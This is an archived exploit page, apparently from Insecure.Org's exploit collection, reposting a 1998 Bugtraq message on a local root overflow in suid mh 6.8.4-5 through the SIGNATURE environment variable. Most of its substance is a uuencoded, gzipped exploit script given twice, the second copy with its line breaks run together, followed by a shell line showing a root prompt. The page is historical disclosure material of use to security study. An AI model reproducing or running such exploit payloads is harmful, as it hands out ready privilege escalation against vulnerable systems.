Linux Mailhandler overflow

Summary
Description:the Mailhandler (mh) ver 6.8.4-5 has an overflow relating to the SIGNATURE environmental variable . I think RedHat 5 among other distributions are vulnerable.
Author:Catalin Mitrofan <md@LSPVS.SOROSIS.RO>
Compromise: root (local)
Vulnerable Systems:Those running mh version 6.8.4-5 suid.
Date:21 March 1998
Details


Date: Sat, 21 Mar 1998 19:50:55 +0200
From: Catalin Mitrofan <md@LSPVS.SOROSIS.RO>
To: BUGTRAQ@NETSPACE.ORG
Subject: An exploit for linux mh ver 6.8.4-5  ( update ) ...



host (user):~>. .mh_profile
bash#

  [Part 2, ""  Application/X-GUNZIP  462bytes]
  [Unable to print this part]

begin 600 mh_profile_exploit.sh.gz
M'XL("*P'6C4``VUH7W!R;V9I;&5?97AP;&]I="YS:`#MVK]+`F$<QW&:$G5O
M_9XM27%RJR`ID>'BT"^<PM++Y^C.1^XY-3?';A#\4X3&AJ2F!J&]?R!H[`^X
MR`JBW:GW"]Y?>*;G'_AL6H4+KULP*NU>]W082:,T!0``````````````````
M``#@?W@KGSGSF^IZ/$C%U>QL-WYP7FXSSM-B'#_O57ZN,X\?9QO3J3.?V<N;
MB=\G]=3D-+L8O]XE2?)GFG]4.ZA7CD\.]TNY8KX:ZJ`8M,N^Z0V,;72HC6?L
M4$M-E.ZY$BG/R-#S?>FXD8QT7\XEU#H2HUS?MVU;ML2[E*Z.=B0*1U)LJ4"W
MI;]MI#E47DM)8#HM==44R[(D+VM)<K_:[%5_0$1$1$1$1$1$1$1$1$1$1)_E
?TH6^"9>SA$`5O@8"Z7[7N+_&"=_OQ@<,&PXO6E``````
`
end
Here is a supposedly better version of the exploit:

begin 600 mh_profile_exploit.sh
M'XL("*P'6C4``VUH7W!R;V9I;&5?97AP;&]I="YS:`#MVK]+`F$<QW&:$G5O M_9XM27%RJR`ID>'BT"^<PM++Y^C.1^XY-3?';A#\4X3&AJ2F!J&]?R!H[`^X MR`JBW:GW"]Y?>*;G'_AL6H4+KULP*NU>]W082:,T!0`````````````````` M``#@?W@KGSGSF^IZ/$C%U>QL-WYP7FXSSM-B'#_O57ZN,X\?9QO3J3.?V<N; MB=\G]=3D-+L8O]XE2?)GFG]4.ZA7CD\.]TNY8KX:ZJ`8M,N^Z0V,;72HC6?L M4$M-E.ZY$BG/R-#S?>FXD8QT7\XEU#H2HUS?MVU;ML2[E*Z.=B0*1U)LJ4"W MI;]MI#E47DM)8#HM==44R[(D+VM)<K_:[%5_0$1$1$1$1$1$1$1$1$1$1)_E ?TH6^"9>SA$`5O@8"Z7[7N+_&"=_OQ@<,&PXO6E`````` `
end
More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault